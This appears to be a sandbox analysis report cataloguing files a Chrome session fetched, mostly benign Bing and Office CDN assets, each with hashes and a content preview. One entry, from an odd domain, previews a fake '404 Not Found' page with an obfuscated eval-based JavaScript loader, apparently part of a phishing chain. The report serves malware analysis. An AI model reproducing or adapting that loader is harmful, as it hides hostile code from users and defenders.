                                                                                                    Preview:var Bnp=Bnp||{};Bnp.Global=Bnp.Global||{};Bnp.Version="1";Bnp.Partner=Bnp.Partner||function(){function i(){return typeof DefaultTrustedTypesPolicy!="undefined"}function s(n){return i()&&DefaultTrustedTypesPolicy.getOpaqueHTML?DefaultTrustedTypesPolicy.getOpaqueHTML(n):n}function h(n){return i()&&DefaultTrustedTypesPolicy.getOpaqueScript?DefaultTrustedTypesPolicy.getOpaqueScript(n):n}function c(n){return i()&&DefaultTrustedTypesPolicy.getOpaqueScriptURL?DefaultTrustedTypesPolicy.getOpaqueScriptURL(n):n}function f(n){sj_evt.fire("onBnpRender",n)}function r(n){var i=i||{};if(typeof i.stringify=="function")return i.stringify(n);var o=typeof n,u=n&&n.constructor==Array,f=[],e,t;if(o!="object"||n==null)return o=="string"?'"'+n+'"':String(n);for(e in n)t=n[e],t&&t.constructor!=Function&&(u?f.push(r(t)):f.push('"'+e+'":'+r(t)));return(u?"[":"{")+String(f)+(u?"]":"}")}function l(n){for(var r=[],u=n.getElementsByTagName("script"),t,i;u.length;)t=u[0],i=sj_ce("script"),t.src?i.src=c(t.src):t.text
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1725), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1725
                                                                                                    Entropy (8bit):5.274895734185393
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:y2x50QNQE0YpOP8A47n0dvZ1fj5O7Rv75gZcODcv/Kum65X9gFiO5yV94GVvwCQO:7Lps4YJOVuK2KG65tggZV5
                                                                                                    MD5:2EF3074238B080B648E9A10429D67405
                                                                                                    SHA1:15D57873FF98195C57E34FC778ACCC41C21172E7
                                                                                                    SHA-256:E90558EB19208AD73F0DE1CD9839D0317594BF23DA0514F51272BF27183F01DA
                                                                                                    SHA-512:C1D7074A0EBF5968B468F98FC4C0C7829999E402DD91C617E679EEB46C873DC04096CBF9277E115FC42C97516A6C11A9F16AFA571E00F0D826BEB463E2D1F7B0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/FdV4c_-YGVxX40_HeKzMQcIRcuc.js
                                                                                                    Preview:var RewardsCreditRefresh;(function(n){function r(t,i,r,u,f,e,o,s,h,c,l,a,v,y){sj_cook.set(t,i,r.toString(),!1,"/");sj_cook.set(t,u,f.toString(),!1,"/");sj_cook.set(t,e,o.toString(),!1,"/");sj_cook.set(t,s,h.toString(),!1,"/");sj_cook.set(t,c,l.toString(),!1,"/");sj_cook.set(t,a,v.toString(),!1,"/");sj_evt.fire("RewardsCookieUpdated");sj_evt.bind("identityHeaderShown",function(){return n.RewardsHeaderAnim(o,r,f,y)},1)}function u(n,r,u,f){var c;u=u||r;var o=_ge("id_rh"),e=_ge("rh_animcrcl"),l=_ge("id_rc");if(o&&l&&(e||_ge("givemuid_heart"))&&!(r<0)&&!(r<n)&&!(u<=0)){var a=800,v=r-n,s=Math.min(100,100*(r/u)),h=e&&s>=100&&n<u,y=v>0,p=Date.now();s>=100&&Lib.CssClass.add(o,"rh_reedm");e&&Lib.CssClass.add(e,"anim");c=function(u){if(u){var k=Date.now(),w=k-p,b=Math.min(w/a,1),d=h?t*b:t*s/100,g=y?Math.min(Math.floor((n+b*v)/f)*f,r):r,l=_ge("rewardsAnimation");e&&e.setAttribute("stroke-dasharray",d.toString()+","+t.toString());u.innerText=g.toString();(h||y)&&(w<a?i(function(){return c(u)}):(u.i
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1598 x 899, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1236532
                                                                                                    Entropy (8bit):7.99453807364983
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:24576:3IR94Q7f3YaeokAGfdoICPLOHpob3i8/eCsjNKSOyP82Rx7BiVQFMqna:3IR9hz3OyedoZyHpyzer023BieKqa
                                                                                                    MD5:EAFC3935A3559F15248B9409658D978F
                                                                                                    SHA1:46242446924C4DB9208646689119EFACFF1C93FD
                                                                                                    SHA-256:B38F5C1FD010828E2DFC90300D3C2AB93DF49CF75C758BBBFF6B0A987D64C448
                                                                                                    SHA-512:A1F345BFA3D85C7436E5F8EC6DA3147779BC903B6E59B24732C1302AEE8366B6E60D5F3281022485E4580B22D440AF80798010E06B0E2639BEB0DBE357347B7E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-consumer-3-mreb-eafc3935a3.png
                                                                                                    Preview:.PNG........IHDR...>...........x1....pHYs.................sRGB.........gAMA......a.....IDATx...W.m....1W^;.|.n..n.K...&...).Y.(.l.....a....~1l.O._...~4.`..m..!AjB.(..@R......7T<g..g...XkW..'V........s......WU .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ..D................o'bl...@ .....@ .....@ .....@ ......M....E.E<'}...r.g..Z...Ws..1.^.~.m.S_..*e..{...x.c..4/....x.{|..gA...s.g.S/.,.2..,.....UAD1...@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ..../..$-..g...."..#.....*.#.B|.5.......2........Y..M..bL=...R.g.7y.{U....q...........>.....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ......B...|].}.HO.....Y.,.x......C.....m.j.#.!....{|.=...S.{<.^.=.km.e.|Y.H...g}'......<..Mc.E..w..J..*.w....@ .....@ .....@ .....@ .....*...E...z..o..._MD.......Q..W.....@ .....@ .....@ .....@ ...^.B/......~.|].._v.g
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (560), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):560
                                                                                                    Entropy (8bit):4.742600822971018
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:CFmwsCfyMJoAfrk3bV0tRWERW5kTGb3aINVN/t/jgClRXirA:CFmNWaAwRCRWERW5kTGb3l1tMClRd
                                                                                                    MD5:9B28631B7C46706DBB7EEF2D16D9549B
                                                                                                    SHA1:2A463D97AF924D3B10C250181D0D902562494184
                                                                                                    SHA-256:F8FA36AB6505DA51BEF5521EF84793391BE9C16DE5ABD6BB99C20FE4D1FB48CF
                                                                                                    SHA-512:9E85DB806D0CBEEC5007D0AB90BEFA6CB036995110637EC616D93FCC4A2A9BAF59BB0ABEF98913E5D9FD88BE445C9ABC04E0B6C7533E4384F945CB743A4CF488
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/KkY9l6-STTsQwlAYHQ2QJWJJQYQ.js
                                                                                                    Preview:var Lib;(function(n){var t;(function(n){function t(n){return n&&n.classList}function i(n,i){t(n)&&n.classList.add(i)}function r(n,i){t(n)&&n.classList.remove(i)}function u(n,i){t(n)&&n.classList.toggle(i)}function f(n,i){return t(n)&&n.classList.contains(i)}function e(n,t){return n.getElementsByClassName?n.getElementsByClassName(t):null}function o(n){return n instanceof SVGElement?n.getAttribute("class"):n.className}n.add=i;n.remove=r;n.toggle=u;n.contains=f;n.getElementByClassName=e;n.getClassAttribute=o})(t=n.CssClass||(n.CssClass={}))})(Lib||(Lib={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 60 x 60, 8-bit colormap, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1929
                                                                                                    Entropy (8bit):7.811068957377272
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:SbgS+jqY4I/a8na4MDgpl2RU/gZ2xY5X/:SbgS+x4IJ2Eu/2xC/
                                                                                                    MD5:4C155FCB5DD3DA464451AD240B6DE606
                                                                                                    SHA1:7A6F3C8D8AF764EBFBC97DC0AA8394E73F041270
                                                                                                    SHA-256:D43878B92743C77FDB440C222D97F70CA661122C98B45436D0DA5B2DB98468ED
                                                                                                    SHA-512:061EDA91A7C4679EF824E3E79B8B52090D1DE129D76008B1A697FE7A0F1900B89473EF635A7D2D909C6E684C0BD63B338B89F897F4CC00D5B5C64341A7433136
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR...<...<......")@....PLTEGpL..^.lT.Z.....8.L...._.i..[...^....yu.do.T....|...X.@<.U..W..BL.S. g.(....,.X..l}..%Y.l.L.H...]..Y\.O.Z.m.>.V..t....t.ZH......T...,.....W.@..J...........}.V..qA.b>.6...V..R.F?.w..p.~...J.P....6...U<.W...k'..s.\/..q.]..B..I#..8...yE.;.....V.7..5...l....sw...#.p.....7..>=..m.@..C..T.P..X..n}<...S.....Z..P..]..{..[=..W..Y..R.k.p.]..o.<..N.Z.l ...F.....h@.h..o..u..8=.tC.....k..J..S.H..zT.G?.UH.c.U....%...F=.e...c.....q.wv.Q...H.~r..`.U..J...N.`.*...N..j...i Y..{u....N...f.O...U*...zE.a..U..X..]..k@.....Z.pB.R=.V...S.b..q{..L.......L=.rG..L.......W..a.....T..Y.A......R.........Gb.g..'....R...L....f..Y.&..3.."...ty.b=......U../L.{R.s......j.a..>..#w.Y..P5....H..l......F...o.D7..8....*..h.V..W.`.m.|.U.T....-.."......4.....9.`.M.......2..+...^_..Xq......[tRNS.. .0. ..u.@P..g.h...xwo..(*..h..._.P``....P `..p...P._......@........@@..0.P@@.)=.7....IDATx^..SteI...37Ng.i.3..4.....m...m..j.S....~..s~..u.q.:....)zW...*..y
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (32000)
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):149053
                                                                                                    Entropy (8bit):5.440876470211605
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:ueeUcMiWa1y6FIwee1fw5hXmk9fVyIRiaO0TnNUrt:feUB8UOf0hX/9YaBTnyrt
                                                                                                    MD5:95F2F0FC50065B017596646C65E90D3E
                                                                                                    SHA1:900566D546C121942D1964250FE4D3CEC23ADF3D
                                                                                                    SHA-256:898F9F6B7CF9D9E797BB187001FCEDEB9999F912C9DC1A2CF5ABD30D961CC69D
                                                                                                    SHA-512:9EF614ABB368F3291A22264287F7A7C7A8217CCEF71BA46E624C8B385D49AA8A9B13C7FEEE5338CAB632D3B1493864E7EE46A3D988F2437B5C66CBA65A5F395F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/bundles/unauth-95f2f0fc50.js
                                                                                                    Preview:var __awaiter=this&&this.__awaiter||function(e,t,n,i){function r(e){return e instanceof n?e:new n(function(t){t(e)})}return new(n||(n=Promise))(function(n,a){function o(e){try{u(i.next(e))}catch(e){a(e)}}function c(e){try{u(i.throw(e))}catch(e){a(e)}}function u(e){e.done?n(e.value):r(e.value).then(o,c)}u((i=i.apply(e,t||[])).next())})},__generator=this&&this.__generator||function(e,t){function n(e){return function(t){return i([e,t])}}function i(n){if(r)throw new TypeError("Generator is already executing.");for(;c&&(c=0,n[0]&&(u=0)),u;)try{if(r=1,a&&(o=2&n[0]?a.return:n[0]?a.throw||((o=a.return)&&o.call(a),0):a.next)&&!(o=o.call(a,n[1])).done)return o;switch(a=0,o&&(n=[2&n[0],o.value]),n[0]){case 0:case 1:o=n;break;case 4:return u.label++,{value:n[1],done:!1};case 5:u.label++,a=n[1],n=[0];continue;case 7:n=u.ops.pop(),u.trys.pop();continue;default:if(o=u.trys,!(o=o.length>0&&o[o.length-1])&&(6===n[0]||2===n[0])){u=0;continue}if(3===n[0]&&(!o||n[1]>o[0]&&n[1]<o[3])){u.label=n[1];break}if
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (3010), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3010
                                                                                                    Entropy (8bit):5.226871204129987
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:OyuzAwlEG4zh4q8m1FLP2OM+53rW2m7r1zSQh1jyaQ6wsDm:MQG4zhvLuOM+ZW/1rj7Q6wgm
                                                                                                    MD5:12AE5624BF6DE63E7F1A62704A827D3F
                                                                                                    SHA1:C35379FC87D455AB5F8AEED403F422A24BBAD194
                                                                                                    SHA-256:1FB3B58965BEBC71F24AF200D4B7BC53E576D00ACF519FB67FE3F3ABDEA0A543
                                                                                                    SHA-512:DA5F5485E1E0FEB2A9A9DA0EAA342EDAEEEFAF12CE4DCD50D0143BF476356CB171BD62CB33C58E6D9D492D67F281982A99FEF3BFD2EBB9E54CF9782F7B92C17B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var Swipe;(function(n){function i(n){var i=null,e,r,u,f;return"touches"in n?(e=n,r=e.targetTouches,r&&r.length==1&&(i={pageX:r[0].pageX,pageY:r[0].pageY})):t?(u=n,i={pageX:u.clientX,pageY:u.clientY}):(f=n,i={pageX:f.pageX,pageY:f.pageY}),i!=null&&(i.pageY+=_w.pageYOffset),i}function r(n){var e="getSelection",f=_w[e]||_d[e],t="",i,r,o,u;return f?(i=f(),t+=f(),n&&t!==""&&i.getRangeAt&&(r=i.getRangeAt(0),o=r&&r.getClientRects&&r.getClientRects.length,o>0&&i.removeAllRanges())):_d.selection&&(u=_d.selection,t+=u.createRange().text,n&&t!==""&&u.empty&&u.empty()),!!t}function e(n){sj_pd(n);r(!0)}function o(n,e,o,s,h,c,l,a,v,y){var w,rt,ut,it;o===void 0&&(o=_d.body);s===void 0&&(s=50);h===void 0&&(h=function(){});c===void 0&&(c=function(){});l===void 0&&(l=function(){});a===void 0&&(a=!1);v===void 0&&(v=!1);y===void 0&&(y=2);y=Math.max(y,2);var p=new u,b=null,k="touchstart",d="touchmove",g="touchend",nt="touchout",tt=a||!f;"ontouchstart"in _d.documentElement?(k="touchstart",d="touchmove",g="t
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 30x30, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1075
                                                                                                    Entropy (8bit):7.311979769342891
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:dKWMiazWo0XxDuLHeOWXG4OZ7DAJuLHenX3+AkkObuN9RgRLVGli:clvuERAabuN9RgRL0i
                                                                                                    MD5:670949E4BD1AA1A2B461ACFB709BCE88
                                                                                                    SHA1:CAC6B63C004948013388CF87A1E0C7ECB865E7C7
                                                                                                    SHA-256:0FC58B0414B5A2967BB19E17704B3CFF58D7582EE95BD91A56AF24F2D819B067
                                                                                                    SHA-512:47DB3FC7404F1F34A9D1F842ED38BC57C07AE9D0D4562A52636BA837EDBD6AFC2CE33E00D513B1E879037CC1F7AD424ACB512A079FFBA07D684A04E0044E980A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=OSK.758464e8cfcabdacd3a79667fd99034e&pid=news&w=30&h=30&c=14&rs=1&qlt=90
                                                                                                    Preview:......JFIF.....`.`....."Exif..MM.*......@..................C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..........Y.n....).b..r.G..<.8..._...jZ..}..c....E..'....%1..O.J..P.'..X..qq"C.$.....:._3.4.-.#h.....qGw.fh...voz.s,......|.i].....]...V/-...b9*G..<.W.SZ5ww...........3..O...Wf.h..`.+.)<...h....0...W.p.[.=v..^........5.^[Y5{.......*N.....R.>.....~....|............./.....k..n..f.#.....P..N......~......m.....s..y.gG..}.ZZ.....
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 11100, version 1.0
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):11100
                                                                                                    Entropy (8bit):7.981314257601996
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:uW6VIH/eJH8zI33ipXWVgfDPbyVvDUOSkWJxRhCaev7eZYxrPEsDtPM95E:UVIHmV8XXcgfDVJkgwaev7LP3pPM95E
                                                                                                    MD5:906BA74C1F7A4FD42174E0F58FAD3C95
                                                                                                    SHA1:3631818302580F0E0DA3ED54E8488CE72B1D4B11
                                                                                                    SHA-256:BB232FD09A6696CE21EC10A43B89933E12AD866DFDE30A4A6A08E08082E6557D
                                                                                                    SHA-512:287E1F5EB314302ED3D78D17516D9105DEAF5AE325C3CDAA1298BAB455C187022B53643A88BB9A64074707A1E19392B12F7BCAC6601EB0FDE66DBE7FB19C2E6D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                                                                                                    Preview:wOF2......+\......V...*.........................?FFTM..&..... .`..z......X.......6.$.... ..@..r..I....n.!$.;S...H.._<............AS1A......ne.]'.....{?..XV..x....R,....V.4..S ...r...._.rg1.5:..........OrI........j.0...........y.B7..........6..S.......6*.1F.F.....=`...q.ti.(.}'r..g...!5C4y/.*.....m:....&X..jl...;.+yVD...h.$.....d.....93.VhFv......lg......A..CFC.o..?..K.W.X..W.......Bf.`...s.a47...~)...ScE$.@.<...M.....T......4..2...7...y.......h.....N$DB.?_.../...|..f.jd"b.;%....R..m...#.e.5UI...B..........H...Iw...V{..q..K..C...0..W.....3}..U..].....".8#2.;(...O....*f4e.5....cb....Ro..b..!.....=p...._.7w..'~.'.>Y.....bQG!............!.<~.....A..9!LG._..>@.D?s..3......Q...5?iH.8t.v..A.....u.......l..=.'tRL.Y,W..R:..~.].4I.t....%.2z}...Z_./................J.....9jG..j#..,B.3*.5a.`.......W..^....8.n. ...&,1.......F.C(.YI..-1w(5.6..5...>..].g.K.x.......ZL[./..dwP)t.|I/.h.T\BR.n.i|P..eL.L_.+.C..........$...t...O_~....~.i..A.,...={q...^..F.Z.7.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:HTML document, ASCII text, with very long lines (1400), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1400
                                                                                                    Entropy (8bit):5.642818631666152
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:kTeRWQ+kG+6uSseKyT5stTaqOwkiYAkjdmHHShDEDDkWGxpDukoUgUMFwm64xlzf:8eN++TEBOV/kZmnSh4fbGx5ukL0wHClr
                                                                                                    MD5:E15EFDC48B61ED635C3D95B2912DF423
                                                                                                    SHA1:A1AC8465A20CDE618E38C5B51C0F45286F035E8E
                                                                                                    SHA-256:C4E86DB964E447D99E380D605CA11C0B21174BFA152AE0CE5A989D3B0F01CDA8
                                                                                                    SHA-512:2938C204D436128BAE1322FD52D8324B825D893B6AEFDD03A7410A1CBCF409357B547E5FFB11D6310F81C82D94E4F97A9F2D882F92D899E7B0CD9BA32F7C0D60
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://jkqbjwq.maxiite.com/
                                                                                                    Preview:<html><head><title>404 Not Found</title><meta name='referrer' content='no-referrer'><script> if (window.self!='google.com') {var _0xc16e=["","split","0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/","slice","indexOf","","",".","pow","reduce","reverse","0"];function _0xe77c(d,e,f){var g=_0xc16e[2][_0xc16e[1]](_0xc16e[0]);var h=g[_0xc16e[3]](0,e);var i=g[_0xc16e[3]](0,f);var j=d[_0xc16e[1]](_0xc16e[0])[_0xc16e[10]]()[_0xc16e[9]](function(a,b,c){if(h[_0xc16e[4]](b)!==-1)return a+=h[_0xc16e[4]](b)*(Math[_0xc16e[8]](e,c))},0);var k=_0xc16e[0];while(j>0){k=i[j%f]+k;j=(j-(j%f))/f}return k||_0xc16e[11]}eval(function(h,u,n,t,e,r){r="";for(var i=0,len=h.length;i<len;i++){var s="";while(h[i]!==n[e]){s+=h[i];i++}for(var j=0;j<n.length;j++)s=s.replace(new RegExp(n[j],"g"),j);r+=String.fromCharCode(_0xe77c(s,e,10)-t)}return decodeURIComponent(escape(r))}("uuLsuKgsuLKsLVIsuLLsuuLsLLKsuKIsuLLsLVlsLVgsuLIsuKgsuLLsuLKsLLKsuLDsLVVsuLusuKIsLVgsLVlsLVVsLKusLKLsuKusuLIsuLIsuLusuLlsLuDsLLLsL
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5382
                                                                                                    Entropy (8bit):5.185593249825311
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:+tRTfT8YGRHT8YevFBcD07Fr09gp0r9whm:u578YEz8Y6FM0J0A0hwI
                                                                                                    MD5:29C72D6678825B223DF6D27E76F37793
                                                                                                    SHA1:234A2A2FA2A5C5083A7D33947F4CE0B435E28B43
                                                                                                    SHA-256:704C299DA34555B2FA12DBC731343FAEE412555AD31339C15D7B07CB91C3C14E
                                                                                                    SHA-512:955E78E57C48938204822EA23B3F65A35ACCA9CCCAC5A651820835A6EE0FC0DF81B4B8CC9818B988A46CF13FEA63A5934E054DCEFFF364840BDD332D0D809748
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="24" height="24" fill="none" xmlns:v="https://vecta.io/nano"><style><![CDATA[.B{color-interpolation-filters:sRGB}.C{flood-opacity:0}.D{stroke-width:1.333}.E{stroke-linecap:round} </style><rect x=".25" y=".25" width="23.5" height="23.5" rx="11.75" fill="#fff"/><rect x=".25" y=".25" width="23.5" height="23.5" rx="11.75" stroke="#e5e5e5" stroke-width=".5"/><g filter="url(#C)"><g clip-path="url(#M)"><g clip-path="url(#N)"><path d="M4.333 7.001c0-.368.298-.667.667-.667h14c.368 0 .667.298.667.667v10a3 3 0 0 1-3 3H7.333a3 3 0 0 1-3-3v-10z" fill="url(#G)"/><mask id="A" maskUnits="userSpaceOnUse" x="4" y="6" width="16" height="14" mask-type="alpha"><path d="M4.334 6.999c0-.368.298-.667.667-.667h14c.368 0 .667.298.667.667v10a3 3 0 0 1-3 3H7.333a3 3 0 0 1-3-3v-10z" fill="url(#H)"/></mask><g mask="url(#A)" class="D E"><g filter="url(#D)"><path d="M8.00024 6.99935V4.66602H16.0002V6.99935" stroke="url(#I)"/></
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (2447), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):2447
                                                                                                    Entropy (8bit):5.8166512571066376
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:vVVcM3lPN1sJeSFE3zYz0lYHbpc/dijVpxN+8m:vBlPNKJeSFjwlY7pvVTzm
                                                                                                    MD5:9BAA6773C6549250A3393E62C56EB395
                                                                                                    SHA1:5BB4EEAD8609CD30B9B96B23EC4FD0082AE64C1D
                                                                                                    SHA-256:DADF403DF8CFE888E59E6A051AEE3783A2BF0BCC60DC1D09A7797DAAEE726CA2
                                                                                                    SHA-512:CF12319CF07897864828D9C950DF4A98A0628D828A7FEE75F1235FC5D3A57C90A40B5DED2743AF2E62B1D13D3F6BE0D302ADA054E7C0D7164B8BA12054909B8D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/W7TurYYJzTC5uWsj7E_QCCrmTB0.css
                                                                                                    Preview:#rewardsEntryPoint{display:flex;align-items:center;position:fixed;top:78px;left:45px;background:#f2f2f2;color:#111;border-radius:50px;padding-right:3px;font-size:11px;height:26px}#rewardsEntryPoint .defaultText{margin:0 6px 0 12px}#rewardsEntryPoint:hover,#rewardsEntryPoint:focus{cursor:pointer}#rewardsEntryPoint svg{background:url(data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjAiIGhlaWdodD0iMjAiIHZpZXdCb3g9IjAgMCAyMCAyMCIgZmlsbD0ibm9uZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPGcgY2xpcC1wYXRoPSJ1cmwoI2NsaXAwXzM1ODlfNjY1NDIpIj4KPHBhdGggZD0iTTEwIDIwQzQuNDg2MjUgMjAgMCAxNS41MTM4IDAgMTBDMCA0LjQ4NjI1IDQuNDg2MjUgMCAxMCAwQzE1LjUxMzggMCAyMCA0LjQ4NjI1IDIwIDEwQzIwIDE1LjUxMzggMTUuNTEzOCAyMCAxMCAyMFpNMTAgMS4yNUM1LjE3NSAxLjI1IDEuMjUgNS4xNzUgMS4yNSAxMEMxLjI1IDE0LjgyNSA1LjE3NSAxOC43NSAxMCAxOC43NUMxNC44MjUgMTguNzUgMTguNzUgMTQuODI1IDE4Ljc1IDEwQzE4Ljc1IDUuMTc1IDE0LjgyNSAxLjI1IDEwIDEuMjVaIiBmaWxsPSJ1cmwoI3BhaW50MF9saW5lYXJfMzU4OV82NjU0MikiLz4KPHBhdGggZD0iTTcuNSAxMEw5LjA5NjI1IDEwLjhDOC4xNjM3NSAxMS4x
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (2554), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):2554
                                                                                                    Entropy (8bit):5.095671803892078
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:btOMIttapPl5yYt+8XYoVN8etAqCITj4Ut5ZQ2gURAUCpLvcs:ZjIttapZI0P4Ut5ZQCRAUCpLvcs
                                                                                                    MD5:1B4B9D03F96BDC877DDC14801B367AD4
                                                                                                    SHA1:0B74EE1F0ACE124FB845338583FAFBC05EEE3DBE
                                                                                                    SHA-256:D2F3BAFC7018AF432DA2135981E3800FC4D5FE4B254AB3605A84BB183167608C
                                                                                                    SHA-512:F52C6595B0A95F497BD6A988188041C6B40031791EDD36F6FA7517C6E48BF5FD5BD6C0421B43B6E9830516A7C64350A35C18324FDDC87747653DDF6BBCD43764
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/C3TuHwrOEk-4RTOFg_r7wF7uPb4.js
                                                                                                    Preview:var UnifiedAnswerGutter;(function(n){function w(n,t,i){i===void 0&&(i=null);t.style.opacity="0";sb_st(function(){Lib.CssClass.add(t,s);n.style.opacity="1";Lib.CssClass.remove(n,s);i&&i()},0)}function b(n){return Lib.CssClass.contains(n,i)}function u(n){return _ge(t(n,"content"))}function t(n,t,i){if(i===void 0&&(i=null),!n)return null;var r="data-"+t;return i===null?n.getAttribute(r):(n.setAttribute(r,i),i)}function f(n,i){return i===void 0&&(i=null),i===null?parseInt(t(n,o),10):(t(n,o,i.toString()),i)}function d(n){return t(n,r)?!1:!0}function g(n,t){var r,i;n&&(r=new p(n,t),r.valid&&(i=_ge(h),i&&LGUtility.isRenderFeature(e)&&LGWidget.initWidget(e,i.parentElement,null,!0,!1)))}var e="UnifiedAnswerGutterWidget",h="ua_ans",o="gtabidx",i="ua_gtrtb_active",s="b_hide",r="dataurl",c="favicon",l="GutterTabAjax",a="ua_tfil-ajaxError",v="ua_tfil-ajaxCompleted",y="ua_tfil-ajaxLoad ua_flex",p=function(){function n(n,t){var i=this,e,u,r;if(i.container=_ge(n),i.ajaxErrMsg=t,i.container){for(e=i.co
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):434
                                                                                                    Entropy (8bit):7.14685501032372
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/78/bcE5AwwyYzMb9U5SytE2in0ECj5iBj4DM:hL5VBp9aSytHsY5dM
                                                                                                    MD5:8DD09FB0203986902F686F81583C8FDC
                                                                                                    SHA1:420D944C7582938D5FA453BD36E369CC8A6CF1BD
                                                                                                    SHA-256:CFA99C80CFABC609E9008233DED2B099C80E1DF13FF7526F1B216982DFBE757C
                                                                                                    SHA-512:9AF66CD99A0798EC94771E26C93D547B73DDCAE81CE36DED93DE1129C4C98583A39004C15E3337111FE9229DC48A7D28C2170AB91A50F9353E8778F0D25333B3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.bing.com/th?id=ODF.1DZ_JhFp0wvfm_WCXhrgng&pid=news&w=16&h=16&c=14&rs=2
                                                                                                    Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d...GIDAT8O.K.q...-.....FP.YVP8Dc.....B4......k.S.T..[K....$%u.fjX.qw...u...k...8..}...~pDcqPp..;.D*...16....H..G...;...Y........b.6M.q`Y.l.n..R1.....BS.$.........................O..W.W......r..S-.:.Uj.4.M..?...G!.Ah.4....B..8.l.R@..WP...!.^....."M....._.8p....2...o......I......K..]a..7....Z..=..98E...:./.AC.......N7.:.J.....IEND.B`.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (1587), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1589
